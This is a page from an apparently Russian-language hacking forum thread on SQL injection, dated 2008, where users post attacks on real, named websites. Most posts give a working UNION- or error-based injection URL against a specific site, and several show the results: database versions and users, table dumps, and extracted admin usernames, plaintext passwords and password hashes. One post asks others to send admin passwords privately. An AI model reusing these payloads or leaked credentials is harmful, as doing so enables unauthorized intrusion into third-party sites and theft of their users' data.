SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 269 of 798
  1. Серенький

    Серенький Banned

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    autolider.info
    --

     
    #5361 Серенький, 3 May 2008
    Last edited: 3 May 2008
    1 person likes this.
  2. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    VERSION: 5.1.22-rc
    USER: cedarv_user@localhost
    DATABASE: cedarv_omnibus
     
    #5362 cash$$$, 4 May 2008
    1 person likes this.
  3. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    2 Nekt
    Боян, ниче там не фильтруется и не жесть никакая, читай мануалы
    http://www.gregorypacks.com/prod.php?ID=-1+union+select+1,2,3,concat_ws(0x3C62723E,DATABASE(),VERSION(),USER()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+--+
     
    #5363 Fuckel, 4 May 2008
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Что скажете насчет этого -
    http://sexnos.ru/registration.php

    В форме ввода пароля, если ввести "> то выдает ошибку что то с датой связонное с запросом..

    пробовал запросы состовлять -но ничего путного не вышло... Можно как то расковырять?
     
    #5364 попугай, 4 May 2008
    1 person likes this.
  5. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.suncity.kiev.ua/index.php?id=90+and+lower(substring(version(),1,1))=4&lang=en

    Слепая четвертой версии, кто хотит раскручивайте)))
    ==============================================

    http://www.balaklawa.com/static.php?code=-1+union+select+1,version(),3--&lng=en

    5 версия, лажа, ничего интересного в таблицах
     
    #5365 truelamer, 4 May 2008
    2 people like this.
  6. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    magic-shop.ru
    первый магазин фокусов и иллюзии
    1 фокус показываю я Ж)
    http://www.magic-shop.ru/?action=product_view&id=-1'+UNION+SELECT+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
    4.1.20-1.gms:[email protected]:w_magics
    Ничё подобрать не получилось но лучше так чем никак, мб там префикс т.к. новости на сайте есть а таблы news нету, ну мб она называется nowosty Ж)
     
    #5366 Ponchik, 5 May 2008
    4 people like this.
  7. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.handshake.in/browse.videos.php?category=-1+union+all+select+1,2,3,concat(admin_username,char(58),admin_password),5,6,7,8+from+joovili_admins/*
    и админка
    http://www.handshake.in/admin/login.php
    admin:admin

    Code:
    http://www.hostreward.com/directory.php?ax=list&sub=7&cat_id=-1+union+all+select+1,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,null,null,7,8,9,10,11,12,13,14+from+links--
     
    #5367 SWAT, 5 May 2008
    Last edited: 5 May 2008
    2 people like this.
  8. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    www.mt8.ru
    Code:
    http://www.mt8.ru/index.php?action=product_view&id=0x3127%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
    4.0.25-log:[email protected]:wwwmedtehnika8ru


    www.bestwine.ru
    Code:
    http://www.bestwine.ru/index.php?action=product_view&id=0x36383327%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
    5.0.45-log:[email protected]:u93285


    www.alcotrade.ru
    Code:
    http://www.alcotrade.ru/index.php?action=product_view&id=0x342733383638%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
    4.1.22-standard-log:interdes_alcotra@localhost:interdes_alcotrade
     
    #5368 CaNNabi$, 5 May 2008
    1 person likes this.
  9. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    www.autovista.ru
    Code:
    http://www.autovista.ru/spy/publish.php?id=-111+UNION+SELECT+email,password,3,4+from+shop/*
     
    #5369 maxster, 5 May 2008
    1 person likes this.
  10. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+@@version)--

    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4



    system_user:nmr

    http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('UpperMenu4','delete_sektor_issues2','AN_Issues','sektor_issues','Calendar','Accreditation',%20'Accreditation_events',%20'Accreditation_showdata',%20'Accreditation2',%20'AN_Authors',%20'AN_Elements',%20'Banner',%20'BLOG_ANSWERS','BLOG_COMMENTS',%20'BLOG_POLLS','BLOG_RESULTS','BLOG_SETTINGS',%20'BLOG_USERS','BLOG_WEBLOG','Calendar_Information'))--

    нашли табличку BLOG_USERS, копаем её......


    http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+column_name+from+information_schema.columns+where+table_name='BLOG_USERS'+and+column_name+not+in('id','uFULLNAME','uUSERNAME','uPASSWORD','uEMAIL','uDATECREATED'))--


    http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+cast(uUSERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(uPASSWORD+as+nvarchar)+from+BLOG_USERS)--

    целый один пользователь)))):

    login:sws
    pass:zzeeuuss
     
    #5370 truelamer, 5 May 2008
    Last edited: 5 May 2008
    1 person likes this.
  11. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    www.intone.ru - полифония,реалтоны и т.д на мобильники

    Code:
    http://www.intone.ru/get2.php?partner=269&id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
     
    #5371 samarin, 5 May 2008
  12. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.chessbase.com/shop/product.asp?pid=1%20or%201=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cbuser'+AND+COLUMN_NAME+NOT+IN+('newsid','ID','Name','PW'))--
     
    #5372 KPOT_f!nd, 5 May 2008
    2 people like this.
  13. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.fifacz.com/index.php?news_id=-9999+union+all+select+1,2,concat(user_name,char(58),user_password),null,5,6,7,null,9,10,11,12,13+from+users--
    Code:
    http://www.velosaddles.com/products.php?cat_id=-1+union+all+select+1,2,null,4,5,concat(username,char(58),password),7+from+logins/*
    Code:
    http://giftman.ru/news_view.php?news_id=-9999+union+select+null,null,null,concat_ws(0x2A,login,pwd_hash,email),null,null,null+FROM+u15364.ra_users/*
     
    #5373 SWAT, 6 May 2008
    Last edited: 6 May 2008
    1 person likes this.
  14. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    Code:
    1.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=@@version--
1.Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 
2.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=(select db_name())-- 
2.'sanza'
3.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=(select system_user)-- 
3. 'SYNERGY1\IUSR_SYNERGY1'
     
    #5374 MaSter GeN, 6 May 2008
  15. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    http://www.reasonmusic.ru/modules/articles/article.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    кому не сложно киньте админ пароли в ЛС за +++++:)
    версия БД 5.0.26
     
    #5375 -=megahertz=-, 6 May 2008
  16. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    http://www.medicina-kiado.hu/index.php?menu=search&bookcateg=-61+UNION+SELECT+1,2,ID+from+medicina_users+limit+0,1/*
    Version - 5.0.44
     
    #5376 -=megahertz=-, 6 May 2008
  17. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    AOECS - Association of European Coeliac Societies
    http://www.aoecs.org/news/list.php?type=-1+UNION+SELECT+1,2,version(),concat(id,0x3a,username,0x3a,password),5,6,7,8+from+users+limit+0,1/*
    version - 4.1.22
    ID - 1
    USER - andre
    PASSWORD - f1350498f018141b526a8e26a0114b54 (twistees)
     
    #5377 -=megahertz=-, 6 May 2008
    1 person likes this.
  18. КВР

    КВР Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    16
    Likes Received:
    30
    Reputations:
    -2
    из новостей:
    Microsoft начала переговоры о возможном слиянии с американской медиакомпанией AOL LLC
    aol.com
    _http://ted.aol.com/
    category.php?catID=999999+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,999,15,16,17,18,19,20,21,22,23/*
    _http://ted.aol.com/authors.php?authorID=999+UNION+SELECT+1,2,3,CHAR(104,97,99,107,51,100),5,CHAR(104,97,99,107,51,100),7,8/*
     
    #5378 КВР, 7 May 2008
    Last edited: 7 May 2008
    2 people like this.
  19. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Добавочка
    [email protected]
    version-4.1.14-standard-log
    database-tedshead


    //Блин в армию забирают :(
     
    #5379 neon_fx, 7 May 2008
    Last edited: 7 May 2008
  20. †c0(aIn?†

    †c0(aIn?† Member

    Joined:
    4 May 2008
    Messages:
    14
    Likes Received:
    5
    Reputations:
    0
    Парни,вот вам шоп,развлекайтесь:

    http://vum.kostanaylife.kz/index.php?id=-17+union+select+ 1,2, 3,4,5,6/*&salerid=0

    db name: t314kz_dbKLNew
    user: t314kz_studior@localhost
    version: 4.1.22-log

    ЗЫ: мой первый пост)
     
    #5380 †c0(aIn?†, 9 May 2008
    Last edited: 9 May 2008
    1 person likes this.
(You must log in or sign up to post here.)
Page 269 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.